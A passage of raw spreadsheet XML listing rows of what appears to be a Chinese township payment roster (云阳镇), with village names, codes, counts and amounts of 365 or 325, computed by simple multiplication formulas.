      </c>
      <c r="F1384" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1384" s="17">
        <v>1</v>
      </c>
      <c r="H1384" s="18">
        <v>365</v>
      </c>
      <c r="I1384" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1384" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1384" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1385" customHeight="1" spans="1:11">
      <c r="A1385" s="16" t="s">
        <v>3745</v>
      </c>
      <c r="B1385" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1385" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1385" s="17" t="s">
        <v>3746</v>
      </c>
      <c r="E1385" s="17" t="s">
        <v>3747</v>
      </c>
      <c r="F1385" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1385" s="17">
        <v>1</v>
      </c>
      <c r="H1385" s="18">
        <v>365</v>
      </c>
      <c r="I1385" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1385" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1385" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1386" customHeight="1" spans="1:11">
      <c r="A1386" s="16" t="s">
        <v>3748</v>
      </c>
      <c r="B1386" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1386" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1386" s="17" t="s">
        <v>3749</v>
      </c>
      <c r="E1386" s="17" t="s">
        <v>3750</v>
      </c>
      <c r="F1386" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1386" s="17">
        <v>1</v>
      </c>
      <c r="H1386" s="18">
        <v>365</v>
      </c>
      <c r="I1386" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1386" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1386" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1387" customHeight="1" spans="1:11">
      <c r="A1387" s="16" t="s">
        <v>3751</v>
      </c>
      <c r="B1387" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1387" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1387" s="17" t="s">
        <v>3752</v>
      </c>
      <c r="E1387" s="17" t="s">
        <v>3753</v>
      </c>
      <c r="F1387" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1387" s="17">
        <v>1</v>
      </c>
      <c r="H1387" s="18">
        <v>365</v>
      </c>
      <c r="I1387" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1387" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1387" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1388" customHeight="1" spans="1:11">
      <c r="A1388" s="16" t="s">
        <v>3754</v>
      </c>
      <c r="B1388" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1388" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1388" s="17" t="s">
        <v>3755</v>
      </c>
      <c r="E1388" s="17" t="s">
        <v>3661</v>
      </c>
      <c r="F1388" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1388" s="17">
        <v>1</v>
      </c>
      <c r="H1388" s="18">
        <v>365</v>
      </c>
      <c r="I1388" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1388" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1388" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1389" customHeight="1" spans="1:11">
      <c r="A1389" s="16" t="s">
        <v>3756</v>
      </c>
      <c r="B1389" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1389" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1389" s="17" t="s">
        <v>3757</v>
      </c>
      <c r="E1389" s="17" t="s">
        <v>3758</v>
      </c>
      <c r="F1389" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1389" s="17">
        <v>1</v>
      </c>
      <c r="H1389" s="18">
        <v>365</v>
      </c>
      <c r="I1389" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1389" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1389" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1390" customHeight="1" spans="1:11">
      <c r="A1390" s="16" t="s">
        <v>3759</v>
      </c>
      <c r="B1390" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1390" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1390" s="17" t="s">
        <v>3760</v>
      </c>
      <c r="E1390" s="17" t="s">
        <v>3627</v>
      </c>
      <c r="F1390" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1390" s="17">
        <v>1</v>
      </c>
      <c r="H1390" s="18">
        <v>365</v>
      </c>
      <c r="I1390" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1390" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1390" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1391" customHeight="1" spans="1:11">
      <c r="A1391" s="16" t="s">
        <v>3761</v>
      </c>
      <c r="B1391" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1391" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1391" s="17" t="s">
        <v>3762</v>
      </c>
      <c r="E1391" s="17" t="s">
        <v>3763</v>
      </c>
      <c r="F1391" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1391" s="17">
        <v>1</v>
      </c>
      <c r="H1391" s="18">
        <v>365</v>
      </c>
      <c r="I1391" s="17">
        <f t="shared" si="70"/>
        <v>365</v>
      </c>
      <c r="J1391" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1391" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1392" customHeight="1" spans="1:11">
      <c r="A1392" s="16" t="s">
        <v>3764</v>
      </c>
      <c r="B1392" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1392" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1392" s="17" t="s">
        <v>3765</v>
      </c>
      <c r="E1392" s="17" t="s">
        <v>3750</v>
      </c>
      <c r="F1392" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1392" s="17">
        <v>2</v>
      </c>
      <c r="H1392" s="18">
        <v>325</v>
      </c>
      <c r="I1392" s="17">
        <f t="shared" si="70"/>
        <v>650</v>
      </c>
      <c r="J1392" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1392" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1393" customHeight="1" spans="1:11">
      <c r="A1393" s="16" t="s">
        <v>3766</v>
      </c>
      <c r="B1393" s="17" t="str">
        <f>B1392</f>
        <v>云阳镇</v>
      </c>
      <c r="C1393" s="17" t="str">
        <f>C1392</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1393" s="16" t="s">
        <v>3767</v>
      </c>
      <c r="E1393" s="16" t="s">
        <v>3657</v>
      </c>
      <c r="F1393" s="17" t="str">
        <f>F1392</f>
        <v>4113210519</v>
      </c>
      <c r="G1393" s="17"/>
      <c r="H1393" s="17"/>
      <c r="I1393" s="17"/>
      <c r="J1393" s="17"/>
      <c r="K1393" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1394" customHeight="1" spans="1:11">
      <c r="A1394" s="16" t="s">
        <v>3768</v>
      </c>
      <c r="B1394" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1394" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1394" s="17" t="s">
        <v>3769</v>
      </c>
      <c r="E1394" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1394" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1394" s="17">
        <v>1</v>
      </c>
      <c r="H1394" s="18">
        <v>365</v>
      </c>
      <c r="I1394" s="17">
        <f>H1394*G1394</f>
        <v>365</v>
      </c>
      <c r="J1394" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1394" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1395" customHeight="1" spans="1:11">
      <c r="A1395" s="16" t="s">
        <v>3770</v>
      </c>
      <c r="B1395" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1395" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1395" s="17" t="s">
        <v>3771</v>
      </c>
      <c r="E1395" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1395" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1395" s="17">
        <v>1</v>
      </c>
      <c r="H1395" s="18">
        <v>365</v>
      </c>
      <c r="I1395" s="17">
        <f>H1395*G1395</f>
        <v>365</v>
      </c>
      <c r="J1395" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1395" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1396" customHeight="1" spans="1:11">
      <c r="A1396" s="16" t="s">
        <v>3773</v>
      </c>
      <c r="B1396" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1396" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1396" s="17" t="s">
        <v>3774</v>
      </c>
      <c r="E1396" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1396" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1396" s="17">
        <v>1</v>
      </c>
      <c r="H1396" s="18">
        <v>365</v>
      </c>
      <c r="I1396" s="17">
        <f>H1396*G1396</f>
        <v>365</v>
      </c>
      <c r="J1396" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1396" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1397" customHeight="1" spans="1:11">
      <c r="A1397" s="16" t="s">
        <v>3775</v>
      </c>
      <c r="B1397" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1397" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1397" s="17" t="s">
        <v>3776</v>
      </c>
      <c r="E1397" s="17" t="s">
        <v>3753</v>
      </c>
      <c r="F1397" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1397" s="17">
        <v>1</v>
      </c>
      <c r="H1397" s="18">
        <v>365</v>
      </c>
      <c r="I1397" s="17">
        <f>H1397*G1397</f>
        <v>365</v>
      </c>
      <c r="J1397" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1397" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1398" customHeight="1" spans="1:11">
      <c r="A1398" s="16" t="s">
        <v>3777</v>
      </c>
      <c r="B1398" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1398" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1398" s="17" t="s">
        <v>3778</v>
      </c>
      <c r="E1398" s="17" t="s">
        <v>3779</v>
      </c>
      <c r="F1398" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1398" s="17">
        <v>2</v>
      </c>
      <c r="H1398" s="18">
        <v>325</v>
      </c>
      <c r="I1398" s="17">
        <f>H1398*G1398</f>
        <v>650</v>
      </c>
      <c r="J1398" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1398" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1399" customHeight="1" spans="1:11">
      <c r="A1399" s="16" t="s">
        <v>3780</v>
      </c>
      <c r="B1399" s="17" t="str">
        <f>B1398</f>
        <v>云阳镇</v>
      </c>
      <c r="C1399" s="17" t="str">
        <f>C1398</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1399" s="16" t="s">
        <v>3781</v>
      </c>
      <c r="E1399" s="16" t="s">
        <v>3782</v>
      </c>
      <c r="F1399" s="17" t="str">
        <f>F1398</f>
        <v>4113210519</v>
      </c>
      <c r="G1399" s="17"/>
      <c r="H1399" s="17"/>
      <c r="I1399" s="17"/>
      <c r="J1399" s="17"/>
      <c r="K1399" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1400" customHeight="1" spans="1:11">
      <c r="A1400" s="16" t="s">
        <v>3783</v>
      </c>
      <c r="B1400" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1400" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1400" s="17" t="s">
        <v>3784</v>
      </c>
      <c r="E1400" s="17" t="s">
        <v>3664</v>
      </c>
      <c r="F1400" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1400" s="17">
        <v>1</v>
      </c>
      <c r="H1400" s="18">
        <v>365</v>
      </c>
      <c r="I1400" s="17">
        <f>H1400*G1400</f>
        <v>365</v>
      </c>
      <c r="J1400" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1400" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1401" customHeight="1" spans="1:11">
      <c r="A1401" s="16" t="s">
        <v>3785</v>
      </c>
      <c r="B1401" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1401" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1401" s="17" t="s">
        <v>3786</v>
      </c>
      <c r="E1401" s="17" t="s">
        <v>3787</v>
      </c>
      <c r="F1401" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1401" s="17">
        <v>1</v>
      </c>
      <c r="H1401" s="18">
        <v>365</v>
      </c>
      <c r="I1401" s="17">
        <f>H1401*G1401</f>
        <v>365</v>
      </c>
      <c r="J1401" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1401" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1402" customHeight="1" spans="1:11">
      <c r="A1402" s="16" t="s">
        <v>3788</v>
      </c>
      <c r="B1402" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1402" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1402" s="17" t="s">
        <v>3789</v>
      </c>
      <c r="E1402" s="17" t="s">
        <v>3790</v>
      </c>
      <c r="F1402" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1402" s="17">
        <v>1</v>
      </c>
      <c r="H1402" s="18">
        <v>365</v>
      </c>
      <c r="I1402" s="17">
        <f>H1402*G1402</f>
        <v>365</v>
      </c>
      <c r="J1402" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1402" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1403" customHeight="1" spans="1:11">
      <c r="A1403" s="16" t="s">
        <v>3791</v>
      </c>
      <c r="B1403" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1403" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1403" s="17" t="s">
        <v>3792</v>
      </c>
      <c r="E1403" s="17" t="s">
        <v>3682</v>
      </c>
      <c r="F1403" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1403" s="17">
        <v>1</v>
      </c>
      <c r="H1403" s="18">
        <v>365</v>
      </c>
      <c r="I1403" s="17">
        <f>H1403*G1403</f>
        <v>365</v>
      </c>
      <c r="J1403" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1403" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1404" customHeight="1" spans="1:11">
      <c r="A1404" s="16" t="s">
        <v>3793</v>
      </c>
      <c r="B1404" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1404" s="17" t="s">
        <v>3794</v>
      </c>
      <c r="D1404" s="17" t="s">
        <v>3795</v>
      </c>
      <c r="E1404" s="17" t="s">
        <v>3796</v>
      </c>
      <c r="F1404" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1404" s="17">
        <v>2</v>
      </c>
      <c r="H1404" s="18">
        <v>325</v>
      </c>
      <c r="I1404" s="17">
        <f>H1404*G1404</f>
        <v>650</v>
      </c>
      <c r="J1404" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1404" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1405" customHeight="1" spans="1:11">
      <c r="A1405" s="16" t="s">
        <v>3797</v>
      </c>
      <c r="B1405" s="17" t="str">
        <f>B1404</f>
        <v>云阳镇</v>
      </c>
      <c r="C1405" s="17" t="str">
        <f>C1404</f>
        <v>小关三组</v>
      </c>
      <c r="D1405" s="16" t="s">
        <v>3798</v>
      </c>
      <c r="E1405" s="16" t="s">
        <v>3799</v>
      </c>
      <c r="F1405" s="17" t="str">
        <f>F1404</f>
        <v>4113210521</v>
      </c>
      <c r="G1405" s="17"/>
      <c r="H1405" s="17"/>
      <c r="I1405" s="17"/>
      <c r="J1405" s="17"/>
      <c r="K1405" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1406" customHeight="1" spans="1:11">
      <c r="A1406" s="16" t="s">
        <v>3800</v>
      </c>
      <c r="B1406" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1406" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1406" s="17" t="s">
        <v>3801</v>
      </c>
      <c r="E1406" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1406" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1406" s="17">
        <v>1</v>
      </c>
      <c r="H1406" s="18">
        <v>365</v>
      </c>
      <c r="I1406" s="17">
        <f t="shared" ref="I1406:I1415" si="71">H1406*G1406</f>
        <v>365</v>
      </c>
      <c r="J1406" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1406" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1407" customHeight="1" spans="1:11">
      <c r="A1407" s="16" t="s">
        <v>3802</v>
      </c>
      <c r="B1407" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1407" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1407" s="17" t="s">
        <v>3803</v>
      </c>
      <c r="E1407" s="17" t="s">
        <v>3604</v>
      </c>
      <c r="F1407" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1407" s="17">
        <v>1</v>
      </c>
      <c r="H1407" s="18">
        <v>365</v>
      </c>
      <c r="I1407" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1407" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1407" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1408" customHeight="1" spans="1:11">
      <c r="A1408" s="16" t="s">
        <v>3804</v>
      </c>
      <c r="B1408" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1408" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1408" s="17" t="s">
        <v>3805</v>
      </c>
      <c r="E1408" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1408" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1408" s="17">
        <v>1</v>
      </c>
      <c r="H1408" s="18">
        <v>365</v>
      </c>
      <c r="I1408" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1408" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1408" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1409" customHeight="1" spans="1:11">
      <c r="A1409" s="16" t="s">
        <v>3807</v>
      </c>
      <c r="B1409" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1409" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1409" s="17" t="s">
        <v>3808</v>
      </c>
      <c r="E1409" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1409" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1409" s="17">
        <v>1</v>
      </c>
      <c r="H1409" s="18">
        <v>365</v>
      </c>
      <c r="I1409" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1409" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1409" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1410" customHeight="1" spans="1:11">
      <c r="A1410" s="16" t="s">
        <v>3809</v>
      </c>
      <c r="B1410" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1410" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1410" s="17" t="s">
        <v>3810</v>
      </c>
      <c r="E1410" s="17" t="s">
        <v>3607</v>
      </c>
      <c r="F1410" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1410" s="17">
        <v>1</v>
      </c>
      <c r="H1410" s="18">
        <v>365</v>
      </c>
      <c r="I1410" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1410" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1410" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1411" customHeight="1" spans="1:11">
      <c r="A1411" s="16" t="s">
        <v>3811</v>
      </c>
      <c r="B1411" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1411" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1411" s="17" t="s">
        <v>3812</v>
      </c>
      <c r="E1411" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1411" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1411" s="17">
        <v>1</v>
      </c>
      <c r="H1411" s="18">
        <v>365</v>
      </c>
      <c r="I1411" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1411" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1411" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1412" customHeight="1" spans="1:11">
      <c r="A1412" s="16" t="s">
        <v>3813</v>
      </c>
      <c r="B1412" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1412" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1412" s="17" t="s">
        <v>3814</v>
      </c>
      <c r="E1412" s="17" t="s">
        <v>3699</v>
      </c>
      <c r="F1412" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1412" s="17">
        <v>1</v>
      </c>
      <c r="H1412" s="18">
        <v>365</v>
      </c>
      <c r="I1412" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1412" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1412" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1413" customHeight="1" spans="1:11">
      <c r="A1413" s="16" t="s">
        <v>3815</v>
      </c>
      <c r="B1413" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1413" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1413" s="17" t="s">
        <v>3816</v>
      </c>
      <c r="E1413" s="17" t="s">
        <v>3799</v>
      </c>
      <c r="F1413" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1413" s="17">
        <v>1</v>
      </c>
      <c r="H1413" s="18">
        <v>365</v>
      </c>
      <c r="I1413" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1413" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1413" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1414" customHeight="1" spans="1:11">
      <c r="A1414" s="16" t="s">
        <v>3817</v>
      </c>
      <c r="B1414" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1414" s="17" t="s">
        <v>3818</v>
      </c>
      <c r="D1414" s="17" t="s">
        <v>3819</v>
      </c>
      <c r="E1414" s="17" t="s">
        <v>2558</v>
      </c>
      <c r="F1414" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1414" s="17">
        <v>1</v>
      </c>
      <c r="H1414" s="18">
        <v>365</v>
      </c>
      <c r="I1414" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1414" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1414" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1415" customHeight="1" spans="1:11">
      <c r="A1415" s="16" t="s">
        <v>3820</v>
      </c>
      <c r="B1415" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1415" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1415" s="17" t="s">
        <v>3821</v>
      </c>
      <c r="E1415" s="17" t="s">
        <v>3822</v>
      </c>
      <c r="F1415" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1415" s="17">
        <v>1</v>
      </c>
      <c r="H1415" s="18">
        <v>365</v>
      </c>
      <c r="I1415" s="17">
        <f t="shared" si="71"/>
        <v>365</v>
      </c>
      <c r="J1415" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1415" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1416" customHeight="1" spans="1:11">
      <c r="A1416" s="16" t="s">
        <v>3823</v>
      </c>
      <c r="B1416" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1416" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1416" s="17" t="s">
        <v>3824</v>
      </c>
      <c r="E1416" s="17" t="s">
        <v>3624</v>
      </c>
      <c r="F1416" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1416" s="17">
        <v>1</v>
      </c>
      <c r="H1416" s="18">
        <v>365</v>
      </c>
      <c r="I1416" s="17">
        <f t="shared" ref="I1416:I1428" si="72">H1416*G1416</f>
        <v>365</v>
      </c>
      <c r="J1416" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1416" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1417" customHeight="1" spans="1:11">
      <c r="A1417" s="16" t="s">
        <v>3825</v>
      </c>
      <c r="B1417" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1417" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1417" s="17" t="s">
        <v>3826</v>
      </c>
      <c r="E1417" s="17" t="s">
        <v>3727</v>
      </c>
      <c r="F1417" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1417" s="17">
        <v>1</v>
      </c>
      <c r="H1417" s="18">
        <v>365</v>
      </c>
      <c r="I1417" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1417" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1417" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1418" customHeight="1" spans="1:11">
      <c r="A1418" s="16" t="s">
        <v>3827</v>
      </c>
      <c r="B1418" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1418" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1418" s="17" t="s">
        <v>3828</v>
      </c>
      <c r="E1418" s="17" t="s">
        <v>3829</v>
      </c>
      <c r="F1418" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1418" s="17">
        <v>1</v>
      </c>
      <c r="H1418" s="18">
        <v>365</v>
      </c>
      <c r="I1418" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1418" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1418" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1419" customHeight="1" spans="1:11">
      <c r="A1419" s="16" t="s">
        <v>3830</v>
      </c>
      <c r="B1419" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1419" s="17" t="s">
        <v>3831</v>
      </c>
      <c r="D1419" s="17" t="s">
        <v>3832</v>
      </c>
      <c r="E1419" s="17" t="s">
        <v>3833</v>
      </c>
      <c r="F1419" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1419" s="17">
        <v>1</v>
      </c>
      <c r="H1419" s="18">
        <v>365</v>
      </c>
      <c r="I1419" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1419" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1419" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1420" customHeight="1" spans="1:11">
      <c r="A1420" s="16" t="s">
        <v>3834</v>
      </c>
      <c r="B1420" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1420" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1420" s="17" t="s">
        <v>3835</v>
      </c>
      <c r="E1420" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1420" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1420" s="17">
        <v>1</v>
      </c>
      <c r="H1420" s="18">
        <v>365</v>
      </c>
      <c r="I1420" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1420" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1420" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1421" customHeight="1" spans="1:11">
      <c r="A1421" s="16" t="s">
        <v>3836</v>
      </c>
      <c r="B1421" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1421" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1421" s="17" t="s">
        <v>3837</v>
      </c>
      <c r="E1421" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1421" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1421" s="17">
        <v>1</v>
      </c>
      <c r="H1421" s="18">
        <v>365</v>
      </c>
      <c r="I1421" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1421" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1421" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1422" customHeight="1" spans="1:11">
      <c r="A1422" s="16" t="s">
        <v>3838</v>
      </c>
      <c r="B1422" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1422" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1422" s="17" t="s">
        <v>3839</v>
      </c>
      <c r="E1422" s="17" t="s">
        <v>3621</v>
      </c>
      <c r="F1422" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1422" s="17">
        <v>1</v>
      </c>
      <c r="H1422" s="18">
        <v>365</v>
      </c>
      <c r="I1422" s="17">
        <f t="shared" si="72"/>
        <v>365</v>
      </c>
      <c r="J1422" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1422" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1423" customHeight="1" spans="1:11">
      <c r="A1423" s="16" t="s">
